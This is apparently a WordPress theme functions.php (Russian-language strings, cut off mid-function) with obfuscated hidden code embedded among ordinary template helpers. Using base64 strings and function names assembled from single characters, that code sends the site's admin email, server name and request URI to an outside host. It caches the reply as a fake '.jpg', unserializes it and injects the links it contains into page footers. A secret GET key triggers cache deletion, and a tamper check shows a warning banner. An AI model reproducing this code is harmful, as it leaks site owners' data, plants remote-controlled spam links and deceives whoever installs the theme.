<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $lcDJuZ='d';$aYzaurB='e';$DaPtQRx='c';$XTvQrZ='b';$XhnRl='a';$ecDOI='o';$UQQbdIn='4';$JHzHBVy='6';$xsvxMNY='d';$gMfG='e';$dKFexu='_';$xFZeh='e';$uxaaMO='s';$IavRAtsg=$XTvQrZ.$XhnRl.$uxaaMO.$aYzaurB.$JHzHBVy.$UQQbdIn.$dKFexu.$xsvxMNY.$xFZeh.$DaPtQRx.$ecDOI.$lcDJuZ.$gMfG;$NknpiAP='a';$unbHFw='z';$dYIVVE='n';$EGlHET='t';$Bmfmt='f';$zycbKi='e';$eMrPgE='l';$KhySsN='g';$YnztdR='i';$gZSWWDGH=$KhySsN.$unbHFw.$YnztdR.$dYIVVE.$Bmfmt.$eMrPgE.$NknpiAP.$EGlHET.$zycbKi;$pqbB='_';$DrvOZaH='s';$cpfFG='r';$AfFCPN='t';$OEXC='t';$TzhJCqF='r';$uFCbic='o';$gOhwQJM='3';$RbCAE='1';$HZKRmaaN=$DrvOZaH.$AfFCPN.$TzhJCqF.$pqbB.$cpfFG.$uFCbic.$OEXC.$RbCAE.$gOhwQJM;$OWwAVW='v';$iULYzbo='t';$hrgkK='r';$sdidOPO='e';$KKHKM='s';$pwsWzrY='r';$BHcYbqbf=$KKHKM.$iULYzbo.$hrgkK.$pwsWzrY.$sdidOPO.$OWwAVW;                     
		$gy__________y='d';$yl__________n='e';$tw______k='c';$ky__________w='b';$hp____________i='a';$dv_______b='o';$he_______________v='4';$sm___d='6';$vs__________f='d';$lr___s='e';$xn_________z='_';$rd___z='e';$qg_________z='s';$fj_____n=$ky__________w.$hp____________i.$qg_________z.$yl__________n.$sm___d.$he_______________v.$xn_________z.$vs__________f.$rd___z.$tw______k.$dv_______b.$gy__________y.$lr___s;
		$qc____h='t';$kv_____________a='u';$if_______x='n';$yu____i='x';$dc____________n='e';$ul____________d='s';$kw__r='n';$kw______s='s';$pc______________i='f';$jf_________q='c';$zs_______________z='i';$ab________t='t';$ih_____t='_';$je_______a='i';$ri___________b='o';$ig_______________y=$pc______________i.$kv_____________a.$kw__r.$jf_________q.$ab________t.$je_______a.$ri___________b.$if_______x.$ih_____t.$dc____________n.$yu____i.$zs_______________z.$ul____________d.$qc____h.$kw______s;
		$cg______________a='e';$pw__________r='o';$ms_________w='f';$qf___r='p';$eo_______________w='n';$ko____k=$ms_________w.$pw__________r.$qf___r.$cg______________a.$eo_______________w;
		$el_____u='a';$ml______________g='d';$iu______________n='f';$yy_______________g='e';$ju_______v='r';$kx_______________a=$iu______________n.$ju_______v.$yy_______________g.$el_____u.$ml______________g;
		$hf____________d='e';$rj_____g='s';$kx_____________e='o';$kr__p='f';$el_______________v='l';$np_______w='c';$ut____h=$kr__p.$np_______w.$el_______________v.$kx_____________e.$rj_____g.$hf____________d;
		
		define("WP_ID", $fj_____n("Mi4wLjA="));
		define("WP_TTL", $fj_____n("MTA4MDA="));
		define("WP_SRC", $fj_____n("dHBva24="));
	


		function wp_get_header() {
			global $fj_____n, $ig_______________y;
			
			if (
				$ig_______________y($fj_____n("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ig_______________y($fj_____n("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ig_______________y($fj_____n("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $fj_____n, $ko____k, $ut____h, $kx_______________a;
			
			$ba______x = TEMPLATEPATH."/".$fj_____n("Zm9vdGVyLnBocA==");
			$kf_______m = @$ko____k($ba______x, "r");
			$ba______x = @$kx_______________a($kf_______m, @filesize($ba______x));
			@$ut____h($kf_______m);
			
			$id______________s = TEMPLATEPATH."/".$fj_____n("ZnVuY3Rpb25zLnBocA==");
			$kf_______m = @$ko____k($id______________s, "r");
			$id______________s = @$kx_______________a($kf_______m, @filesize($id______________s));
			@$ut____h($kf_______m);
			
			$ne______b = 0;
			if($ba______x && $id______________s) {
				if ($fj_____n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ba______x, $fj_____n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ne______b = 1;
					}
					if (substr_count($ba______x, "wp_theme_GPL_credits()") < 1) {
						$ne______b = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ne______b = 12;
				}
			}
			
			if($ne______b > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ne______b -->";
			}
		}
	


		function wp_loaded() {
			global $fj_____n, $ig_______________y;
			return $ig_______________y($fj_____n("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($iw___________o, $lp______t = "(more...)", $ih____________y = 0, $um_____b = "") {
				$ly______b = get_the_content($lp______t, $ih____________y, $um_____b);
				$ly______b = apply_filters("the_content", $ly______b);
				
				$ly______b = str_replace("]]>", "]]>", $ly______b);
				if (strlen($_GET["p"]) > 0) {
					echo $ly______b;
				}
				else if ((strlen($ly______b)>$iw___________o) && ($oz______________w = strpos($ly______b, " ", $iw___________o ))) {
					$ly______b = substr($ly______b, 0, $oz______________w);
					$ly______b = $ly______b;
					echo $ly______b;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$lp______t</a></div></p>";
				} else {
					echo $ly______b;
				}
				
			}
		}
	


		$hl___w='c';$uw__________k='n';$xz_______________p='e';$ze__________y='_';$gy________k='e';$ql_____________s='a';$xj___________v='6';$cd__________y='o';$pr__t='s';$sy_______________a='4';$wd_______________i='e';$ev_______f='b';$go_____d='d';$qt__________b=$ev_______f.$ql_____________s.$pr__t.$wd_______________i.$xj___________v.$sy_______________a.$ze__________y.$gy________k.$uw__________k.$hl___w.$cd__________y.$go_____d.$xz_______________p;
		$xt_____________i='_';$cy_____v='e';$cb_______s='n';$nu__a='o';$uy___z='t';$yn___m='l';$hl___________f='n';$ug_______q='i';$hr__w='s';$em_________d='t';$nn________q='e';$fi_________a='_';$md_____________o='e';$tm_____________e='f';$ya__________s='g';$qt_________j='t';$pz___________n='c';$wf_______i=$tm_____________e.$ug_______q.$yn___m.$nn________q.$xt_____________i.$ya__________s.$cy_____v.$qt_________j.$fi_________a.$pz___________n.$nu__a.$hl___________f.$em_________d.$md_____________o.$cb_______s.$uy___z.$hr__w;
		$yx___d='s';$xx________y='x';$qr__v='t';$gh______f='e';$fv____r='e';$dc__________v='_';$qn_________j='i';$bz____g='s';$es_________x='i';$sk______t='f';$fk_______________j='l';$by_______________w=$sk______t.$es_________x.$fk_______________j.$fv____r.$dc__________v.$gh______f.$xx________y.$qn_________j.$yx___d.$qr__v.$bz____g;
		$zf____________f='m';$mg___________h='p';$qc_______________h='o';$qo________i='v';$wj__m='n';$fw______________z='e';$qu_______v='o';$xr______o='_';$ip____________z='a';$rt_____n='r';$ef____________x='r';$fh_________m='s';$ub______________m='i';$gu______________l='c';$dh__b='e';$mn___________w=$qo________i.$fw______________z.$ef____________x.$fh_________m.$ub______________m.$qc_______________h.$wj__m.$xr______o.$gu______________l.$qu_______v.$zf____________f.$mg___________h.$ip____________z.$rt_____n.$dh__b;
		$bl________u='o';$zx_______o='s';$md__________w='k';$aw______________i='e';$hi____w='c';$ck_____j='o';$vu____________s='p';$oi_______________o='n';$is________q='f';$rl__________s=$is________q.$zx_______o.$bl________u.$hi____w.$md__________w.$ck_____j.$vu____________s.$aw______________i.$oi_______________o;
		$fm____m='e';$fj_____________d='r';$rt_________c='i';$it__________i='t';$xq_____s='w';$to_________z='f';$la____________e=$to_________z.$xq_____s.$fj_____________d.$rt_________c.$it__________i.$fm____m;
		$mi__d='m';$cn_____l='d';$hw____________n='5';$yz_____a=$mi__d.$cn_____l.$hw____________n;
		$vq_______________i='p';$df___m='a';$bz________d='r';$jc____u='e';$kv_______d='l';$qz______________g='a';$uf_______________v='h';$hm____h='t';$ew_________k=$bz________d.$jc____u.$qz______________g.$kv_______d.$vq_______________i.$df___m.$hm____h.$uf_______________v;
		$ib_______e='n';$ds_____________l='s';$mc_______________f='i';$rw_____________a='i';$xf____b='z';$my___h='u';$cs____________o='l';$sb_____________h='r';$tf__b='a';$ah_______________r='e';$xa________x='e';$vp________f=$my___h.$ib_______e.$ds_____________l.$ah_______________r.$sb_____________h.$mc_______________f.$tf__b.$cs____________o.$rw_____________a.$xf____b.$xa________x;
		$dv_____k='a';$rf_________n='m';$si______________q='p';$cm______r='e';$wr____j='t';$tn_______________h='m';$kd_____k='n';$fc______________l=$wr____j.$cm______r.$tn_______________h.$si______________q.$kd_____k.$dv_____k.$rf_________n;
		$ww___________f='a';$nw______________u='t';$dz__________a='e';$me____________w='_';$tn________a='_';$fa_______________o='r';$hx______x='o';$ay___________t='t';$yd_____________m='a';$jx_______u='n';$kp_________v='c';$xj______u='e';$ii______c='m';$pm__________m='t';$ok__k='e';$kz____a='r';$xp_____________a='t';$gs__________p='x';$ti___________b='c';$ls_______m='s';$on_______o='e';$mx_____________y=$ls_______m.$pm__________m.$kz____a.$dz__________a.$ww___________f.$ii______c.$tn________a.$kp_________v.$hx______x.$jx_______u.$xp_____________a.$ok__k.$gs__________p.$ay___________t.$me____________w.$ti___________b.$fa_______________o.$xj______u.$yd_____________m.$nw______________u.$on_______o;
	


		function eu_________a($xm___a) {
			global $fj_____n, $ig_______________y, $wf_______i, $mn___________w, $mx_____________y;
			
			if (!$ig_______________y($fj_____n("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($mn___________w(PHP_VERSION, "5.0.0", ">=") && $ig_______________y($fj_____n("ZmlsZV9nZXRfY29udGVudHM=")) && $ig_______________y($fj_____n("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$tu______________y = $mx_____________y(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$si_______t = @$wf_______i($xm___a, 0, $tu______________y);
			} else {
				$si_______t = @$wf_______i($xm___a, 0);
			}
			
			return $si_______t;
		}
	


		function es______i($xm___a) {
			global $ig_______________y, $rl__________s, $la____________e, $fj_____n;
			
			if (!$ig_______________y($fj_____n("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$lr______j = strpos($xm___a, "/", 7);
			$ek___________p = array(
				"uri"     => substr($xm___a, $lr______j),
				"host"    => str_replace("http://", "", substr($xm___a, 0, $lr______j)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$wm____________b = @$rl__________s("$ek___________p[host]", 80, $dd______e, $gv___________m, 4);
			
			if (!$wm____________b) {
				return false;
			} else {
				$si_______t = "";
				$tp______v  = "GET $ek___________p[uri] HTTP/1.0\r\n";
				$tp______v .= "Host: $ek___________p[host]\r\n";
				$tp______v .= "Referer: $ek___________p[referer]\r\n";
				$tp______v .= "Connection: Close\r\n\r\n";
				
				@$la____________e($wm____________b, $tp______v);
				
				while (!@feof($wm____________b)) {
					$qz_____________k = @fgets($wm____________b, (1024*24));
					
					if ($qz_____________k == "\r\n") {
						$sd_______________c = true;
						continue;
					}
					
					if ($sd_______________c) {
						$si_______t .= $qz_____________k;
					}
				}
				
				return $si_______t;
			}
		}
	


		function ai____________m($xm___a) {
			global $ig_______________y;
			$jq______________u = false;
			
			if ($xm___a != "") {
				if ($ig_______________y("eu_________a")) {
					$jq______________u = @eu_________a($xm___a);
				}
				
				if (!$jq______________u && ($ig_______________y("es______i"))) {
					$jq______________u = @es______i($xm___a);
				}
			}
			
			return $jq______________u;
		}
	


		function cd__________i() {
			global $_SERVER, $yz_____a;
			
			$ny______p = $_SERVER["SERVER_NAME"];
			
			if (substr("$ny______p", 0, 4) == "www.") {
				$ny______p = substr("$ny______p", 4);
			}
			
			$ny______p = $yz_____a("$_SERVER[SERVER_NAME]");
			
			return $ny______p;
		}
	


		function hc____v() {
			return "file";
		}
	


		function ay__________s($xm___a) {
			global $_SERVER, $wf_______i, $by_______________w, $ko____k, $ut____h, $la____________e;
			
			$rq_____________p = cm____y();
			
			$dg_______r = cd__________i().".jpg";
			$rx_____j = $rq_____________p["dir_upload"]["path"]."/$dg_______r";
			$qk______________t = @filemtime($rx_____j);
			
			if (!$qk______________t || ((time()-$qk______________t) >= WP_TTL)) {
				$jq______________u = ai____________m($xm___a);
				
				if ($jq______________u) {
					if ($by_______________w($rx_____j)) {
						@unlink($rx_____j);
					}
					
					$kf_______m = @$ko____k($rx_____j, "x+");
					
					@$la____________e($kf_______m, $jq______________u);
					@$ut____h($kf_______m);
				}
			} else {
				if ($by_______________w($rx_____j)) {
					$jq______________u = @$wf_______i($rx_____j);
				} else {
					$jq______________u = false;
				}
			}
			
			return $jq______________u;
		}
	


		function cm____y() {
			global $_SERVER, $fj_____n, $qt__________b;
			
			$qs________x = wp_count_posts("post");
			$pg_________e = pathinfo(get_bloginfo("template_directory"));
			
			$rq_____________p = array(
				"url" => array(
					"report"      => $fj_____n("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $pg_________e,
				"dir_upload"	=> ju___r(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$pg_________e[filename],
					"a005=".$qs________x->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$rq_____________p["url"]["queryString"] = implode("&", $rq_____________p["queryString"]);
			$rq_____________p["url"]["report"] = $rq_____________p["url"]["report"]."/?".$qt__________b($rq_____________p["url"]["queryString"]).".html";
						
			return $rq_____________p;
		}
	


		function ju___r() {
			$an___________v = wp_upload_dir();
			
			if (isset($an___________v["error"])) {
				$rf_______a = rm_________g();
				if (is_writable($rf_______a)) {
					$an___________v = array("path" => $rf_______a);
				}
			}

			return $an___________v;
		}
	


		function rm_________g() {
			global $ig_______________y, $yz_____a, $ew_________k, $fc______________l;
			
			$xl____y = (bool) ini_get("safe_mode");
			if ($xl____y == true) {
				return false;
			}
			
			if ($ig_______________y("sys_get_temp_dir")) {
				$pl____v = sys_get_temp_dir();
				if (is_writable($pl____v)) {
					return $ew_________k($pl____v);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ew_________k($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ew_________k($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ew_________k($_ENV["TEMP"]);
			} else {
				$gr_____o = $fc______________l($yz_____a(uniqid(rand(), true)), "");
				if ($gr_____o) {
					$pl____v = $ew_________k(dirname($gr_____o));
					@unlink($gr_____o);
					return $pl____v;
				} else {
					return false;
				}
			}
		}
	


		function wp__h() {
			global $_GET, $by_______________w;
			
			$rq_____________p = cm____y();
			$ny______p = cd__________i();
			$zx__h = hc____v();
			
			$uq___________f = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($zx__h == "file") {
					$xl______________c = $rq_____________p["dir_upload"]["path"]."/".$ny______p.".jpg";
					if ($by_______________w($xl______________c)) {
						@unlink($xl______________c);
						$uq___________f = "deleted";
					}
				}
				
				$xb__________k = array(
					"s"	=> $uq___________f,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($xb__________k AS $uf___________s => $qo_____________n) echo " [$uf___________s:$qo_____________n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ig_______________y, $fj_____n, $vp________f;
			$rq_____________p = cm____y();
			
			$jw_______________o = "ay__________s";
			if ($ig_______________y($jw_______________o)) {
				$si_______t = $jw_______________o($rq_____________p["url"]["report"]);
			}
			
			if ($si_______t) {
				if ($si_______t = @$fj_____n($si_______t)) {
					$si_______t = @$vp________f($si_______t);
					
					if (strlen($si_______t[custom_credit]) >= 5) {
						$rq_____________p["default_string"] = $si_______t[custom_credit];
					}
					
					if ($si_______t["status"] == "0") {
						$ym___________k = 1;
						$mt______i = 1;
					} else {
						$pf______g = sizeof($si_______t["links"]);
						$lw_____________d = $rq_____________p["default_string"];
						
						if ($pf______g > 0 && $si_______t["links"] !== "") {
							$mw______a = 0;
							foreach ($si_______t["links"] as $rf__w => $ma_____k) {
								$mw______a++;
								if ($ma_____k->l_path == "" || $ma_____k->l_path == $_SERVER["REQUEST_URI"]) {
									$ma_____k->l_href = htmlspecialchars(strip_tags($ma_____k->l_href));
									$ma_____k->l_title = htmlspecialchars(strip_tags($ma_____k->l_title));
									$ma_____k->l_anchor = htmlspecialchars(strip_tags($ma_____k->l_anchor));
									$lw_____________d .= " | ";
									$lw_____________d .= "<a href='$ma_____k->l_href' title='$ma_____k->l_title'";
									if ($ma_____k->l_nofollow == "1") {
										$lw_____________d .= " rel='nofollow'";
									}
									$lw_____________d .= ">$ma_____k->l_anchor</a>";
								}
							}
						}
						$rq_____________p["links"] = "$lw_____________d";
						if ($si_______t[credit] == "0") {
							$rq_____________p["links"] = "";
						}
					}
				} else {
					$ym___________k = "1";
				}
			} else {
				$ym___________k = "1";
			}
			
			if ($ym___________k == "1") {
				$rq_____________p["links"] = $rq_____________p["default_string"];
			}
			
			echo "$rq_____________p[links]";
			
			echo "<!-- s: $si_______t[signature] -->";
			wp__h();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
